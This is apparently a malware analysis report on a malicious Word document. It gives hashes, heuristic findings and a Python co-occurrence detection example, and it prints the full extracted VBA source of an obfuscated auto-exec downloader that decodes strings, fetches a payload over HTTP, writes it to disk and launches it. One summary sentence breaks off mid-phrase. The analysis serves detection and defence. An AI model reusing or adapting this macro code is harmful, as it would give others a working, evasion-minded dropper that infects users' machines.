Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6d5253398f7c3b18…

MALICIOUS

Office (OLE)

Size: 34.0 KB
Created: 2015-01-19 10:22:00
Authoring application: Microsoft Office Word
First seen: 2015-02-17
MD5: c7fb34847ea945984d6d690c4b051b17
SHA-1: cdbcc78f8c63af80fc4b5552029702f1a52ba78e
SHA-256: 6d5253398f7c3b18c749e2880a4574ddcc785aebf01eb6d3b33b83c18da45c7c
Risk score: 316

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 User Execution: Malicious File

The sample's auto-exec macro downloads a file over HTTP and executes it. The entry point autoopen (and the aliases WGRW and s5AHNe) calls PtBTpJ, which builds every sensitive string at runtime with the custom decoder PwlVK1OLyI: the COM ProgIDs passed to CreateObject, the HTTP verb and request header, the Environ() variable name, the drop path and the download URL are all stored as encoded constants, so none of them appears as a literal in the source. PfnG instantiates an object exposing the XMLHTTP interface (Open, setRequestHeader, Send, responseBody), fetches the URL and hands .responseBody to lqj4OnON, which writes it to disk with ADODB.Stream (Type = 1, binary; SaveToFile with option 2, create-or-overwrite). PtBTpJ then instantiates a second COM object and calls .Open on the path built from Environ() and the decoded file name, which launches the dropped file. The report also asserts persistence through the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy; the recovered VBA source contains no registry write, so that claim is not corroborated by the visible macro and should be confirmed dynamically or attributed to another stream before it is reported as a fact. The script also attempts to download a payload from the reconstructed URL the embedded link

Heuristics 9

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        If lqj4OnON(fdgert3r, .responseBody) = False Then
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's generic description assumes that no modern VBA project was recovered and that no stronger macro-virus family marker is present; in this report a VBA project was recovered (macros.bas, listed below), so here the marker is redundant with OLE_VBA_AUTOOPEN. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
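The OLE_VBA_HTTP_DROP_EXEC and OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER findings above are co-occurrence heuristics: no single keyword is decisive, the verdict comes from an auto-exec entry point appearing together with an HTTP response read, a file write and a CreateObject whose ProgID is computed rather than literal. The Python below is an added example of that logic written for this page; it is not the scanner's own implementation, its regexes and the rule ids it adds beyond the report's (OLE_VBA_CREATEOBJ_DYNAMIC_PROGID, OLE_VBA_HTTP_RESPONSE, OLE_VBA_FILE_WRITE, OLE_VBA_EXEC_KEYWORD, OLE_VBA_HTTP_DROP) are this example's assumptions, and the input is a constructed excerpt of the macros.bas listing shown later in the report.

```python
import re
from dataclasses import dataclass

# Constructed input: the lines of this report's macros.bas that carry the indicators,
# trimmed so the excerpt stays short. Nothing here was altered beyond trimming.
VBA_EXCERPT = r"""
Sub autoopen()
     s5AHNe
End Sub
Public Sub PtBTpJ()
ghjrtg = PwlVK1OLyI(h3OXMLBCsI, GuXH1)
ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5)
If PfnG(ghjrtg, ktyreg) = False Then
    GoTo ExitHere
End If
 Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
yjukj5wef.Open Environ(PwlVK1OLyI(gvFktaB, HFfeUiZo)) & PwlVK1OLyI(Z5AlucBiW, SORyht2aNVn)
End Sub
Public Function PfnG(strTarget As String, fdgert3r As String) As Boolean
Set dsfrt34t43g = CreateObject(PwlVK1OLyI(TYRE, V8aAdPb))
With dsfrt34t43g
    .Open PwlVK1OLyI(wPWCLsRmA, vymArH), strTarget, False, strUN, strPW
    .Send
    If lqj4OnON(fdgert3r, .responseBody) = False Then
        GoTo errHere
    End If
End With
End Function
Private Function lqj4OnON(strFilePath, bytArray) As Boolean
Set objStream = CreateObject(PwlVK1OLyI(lu0ADI, tocFp6Ci))
With objStream
    .Type = 1
    .Open
    .Write bytArray
    .SaveToFile strFilePath, 2
End With
End Function
"""


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line: str


# Rule ids OLE_VBA_AUTOOPEN / OLE_VBA_CREATEOBJ / OLE_VBA_ENVIRON follow the report;
# the other ids and every regex are this example's own (hypothetical) definitions.
RULES = [
    ("OLE_VBA_AUTOOPEN", "low",
     re.compile(r"^(?:public\s+|private\s+)?sub\s+(?:auto_?open|autoexec|document_open|workbook_open)\s*\(", re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    # ProgID argument does not start with a quote, so it is computed at runtime.
    ("OLE_VBA_CREATEOBJ_DYNAMIC_PROGID", "high", re.compile(r"\bCreateObject\s*\(\s*[^\s\"']", re.I)),
    ("OLE_VBA_HTTP_RESPONSE", "medium", re.compile(r"\.responseBody\b", re.I)),
    ("OLE_VBA_FILE_WRITE", "medium", re.compile(r"\.SaveToFile\b", re.I)),
    ("OLE_VBA_ENVIRON", "low", re.compile(r"\bEnviron\s*\(", re.I)),
    # Plain execution keywords. They do not fire on this sample: the launcher's ProgID
    # is decoded at runtime and the call is a bare .Open on that object.
    ("OLE_VBA_EXEC_KEYWORD", "high",
     re.compile(r"\bShell\s*\(|\.Run\b|\.ShellExecute\b|\bWScript\.Shell\b", re.I)),
]


def scan(source: str) -> list[Finding]:
    """Run every rule over each non-comment line and collect the matches."""
    findings = []
    for raw in source.splitlines():
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue  # blank line or VBA comment
        for rule, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(rule, severity, line))
    return findings


def composite_verdict(findings: list[Finding]) -> tuple[str, str]:
    """Co-occurrence scoring modelled on the report's OLE_VBA_HTTP_DROP_EXEC finding."""
    hit = {f.rule for f in findings}
    drop = {"OLE_VBA_HTTP_RESPONSE", "OLE_VBA_FILE_WRITE"} <= hit
    if drop and "OLE_VBA_AUTOOPEN" in hit:
        return ("OLE_VBA_HTTP_DROP_EXEC", "critical")
    if drop:
        return ("OLE_VBA_HTTP_DROP", "high")
    if "OLE_VBA_CREATEOBJ_DYNAMIC_PROGID" in hit:
        return ("OLE_VBA_DYNAMIC_PROGID_ONLY", "medium")
    return ("NONE", "info")


if __name__ == "__main__":
    hits = scan(VBA_EXCERPT)
    for f in hits:
        print(f"{f.rule:34s} {f.severity:8s} {f.line}")
    print("verdict:", composite_verdict(hits))
```

The point the run makes is that OLE_VBA_EXEC_KEYWORD never fires on this sample while the composite still reaches critical: a keyword-only scanner that waits for Shell, WScript.Shell or ShellExecute misses a dropper whose ProgIDs are decoded at runtime, which is why the verdict has to be built from the download-write-autoexec shape instead.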

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3454 bytes
SHA-256: afc705c92c6c04d48e0cca9d44975d92edb565db6d5a0a2e27f395c23947bc71
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const tocFp6Ci = "RHmhiglW"
Private Const lu0ADI = "“Њј¬«•їЛєТЙЦ"
Private Const FXC0O = "FcXBDjpJ"
Private Const OfmF = "ґТ…ҐҐНШЇЏЕ··ЮђёИОЈ°УФ§ЧЅ"
Private Const iD2E0Ifr = "isuHYmuy"
Private Const YaoZ6ISB = "МФШ°ѕљШибйєИЩ"
Private Const vymArH = "DVuVgasc"
Private Const wPWCLsRmA = "‹›Й"
Private Const V8aAdPb = "IIirEgAf"
Private Const TYRE = "–ІМдґЪ°МЅ—К’і‰ќќ№"
Private Const SORyht2aNVn = "WqTYmiRe"
Private Const Z5AlucBiW = "іХЗїаНё“ЦМѕ"
Private Const HFfeUiZo = "bdVuKCmU"
Private Const gvFktaB = "¶©ЈЕ"
Private Const seq = "fDJRuIHX"
Private Const EVsZjgGped = "№¬Їѕбw‰Иґ¶»ШЄјПіё"
Private Const dgL8Y5 = "jpwmSbca"
Private Const iRqo = "ЖФкУЖЖЙЏХпТ"
Private Const Oat7OoU5O = "oclJEhjQ"
Private Const CDQluD = "ГЁ№љ"
Private Const GuXH1 = "jkinLRYD"
Private Const h3OXMLBCsI = "ТЯЭЮ†Ѓ€©МЭУВБЕаР—С»ї€ФЮ�РµА‡ПгО"

Sub s5AHNe()
 PtBTpJ
End Sub
Sub WGRW()
     s5AHNe
End Sub
Sub autoopen()
     s5AHNe
End Sub
Public Sub PtBTpJ()
On Error GoTo errHere
 
Dim hk5tg As String
 
Dim ghjrtg As String
Dim ktyreg As String
 
ghjrtg = PwlVK1OLyI(h3OXMLBCsI, GuXH1)
ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5)
 
If PfnG(ghjrtg, ktyreg) = False Then

    GoTo ExitHere
End If
 Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
yjukj5wef.Open Environ(PwlVK1OLyI(gvFktaB, HFfeUiZo)) & PwlVK1OLyI(Z5AlucBiW, SORyht2aNVn)
 
ExitHere:
    Exit Sub
errHere:

    Resume ExitHere

End Sub
 
Public Function PfnG(strTarget As String, fdgert3r As String, Optional strUN As String, Optional strPW As String) As Boolean
On Error GoTo errHere
 
Dim dsfrt34t43g As Object
Dim yukjh4 As String
 PfnG = True
Set dsfrt34t43g = CreateObject(PwlVK1OLyI(TYRE, V8aAdPb))
With dsfrt34t43g
    .Open PwlVK1OLyI(wPWCLsRmA, vymArH), strTarget, False, strUN, strPW
    .setRequestHeader PwlVK1OLyI(YaoZ6ISB, iD2E0Ifr), PwlVK1OLyI(OfmF, FXC0O)
    .Send
    If lqj4OnON(fdgert3r, .responseBody) = False Then
        GoTo errHere
    End If
End With
 
ExitHere:
    Set dsfrt34t43g = Nothing
    Exit Function
 
errHere:
     PfnG = False
    Resume ExitHere
    
End Function
 
Private Function lqj4OnON(strFilePath, bytArray) As Boolean
On Error GoTo errHere
 
 
Dim objStream  As Object
 lqj4OnON = True
Set objStream = CreateObject(PwlVK1OLyI(lu0ADI, tocFp6Ci))
With objStream
    .Type = 1
    .Open
    .Write bytArray
    .SaveToFile strFilePath, 2
End With
 
ExitHere:
    Exit Function
errHere:
     lqj4OnON = False
    Resume ExitHere

End Function



Public Function PwlVK1OLyI(ByVal strData As String, ByVal strKey As String)

Dim bData() As Byte
Dim bKey() As Byte
bData = StrConv(strData, vbFromUnicode)
bKey = StrConv(strKey, vbFromUnicode)
For i = 0 To UBound(bData)
If i <= UBound(bKey) Then
bData(i) = bData(i) - bKey(i)
Else
bData(i) = bData(i) - bKey(i Mod UBound(bKey))
End If
Next i
 PwlVK1OLyI = StrConv(bData, vbUnicode)
End Function